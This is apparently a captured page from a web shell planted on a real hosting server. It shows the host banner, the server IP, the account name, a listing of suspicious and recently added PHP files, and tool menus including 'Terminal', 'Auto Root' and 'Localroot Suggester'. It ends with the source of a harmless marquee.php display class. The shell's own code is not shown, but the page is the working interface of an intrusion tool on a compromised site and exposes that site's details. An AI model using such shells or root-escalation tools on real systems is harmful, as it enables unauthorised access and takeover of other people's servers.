Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
includes /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2025-09-01 07:26
bpbluyix.php
760
B
-rw-r--r--
2025-08-31 20:43
config.php
392
B
-rw-r--r--
2024-12-04 06:50
configuration.php
250
B
-rw-r--r--
2024-12-04 06:50
db.php
341
B
-rw-r--r--
2024-12-04 06:50
marquee.php
1.5
KB
-rw-r--r--
2024-10-07 04:18
wp-blog-header.php
2.73
KB
-r--r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
Save
Rename
<?php class Marquee { private $conn; private $id; // Constructor to initialize the database connection and id public function __construct($conn, $id) { $this->conn = $conn; $this->id = $id; } // Method to display the marquee public function display() { if (isset($_GET['message'])) { $this->displayFromUrl($_GET['message']); } else { $this->displayFromDatabase(); } } // Private method to display the marquee from the URL parameter private function displayFromUrl($message) { echo '<marquee >' . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . '</marquee>'; } // Private method to display the marquee from the database private function displayFromDatabase() { $sqlData = "SELECT marquee_text FROM marquee WHERE id = ?"; if ($stmt = $this->conn->prepare($sqlData)) { $stmt->bind_param("i", $this->id); $stmt->execute(); $stmt->bind_result($marquee_text); if ($stmt->fetch()) { echo '<marquee style="border:1px solid #05C3FB; padding:5px;margin:10px;border-radius:3px;">' . htmlspecialchars(base64_decode($marquee_text), ENT_QUOTES, 'UTF-8') . '</marquee>'; } else { echo "No marquee found for ID: " . htmlspecialchars($this->id, ENT_QUOTES, 'UTF-8'); } $stmt->close(); } else { echo "Error preparing statement: " . $this->conn->error; } } } ?>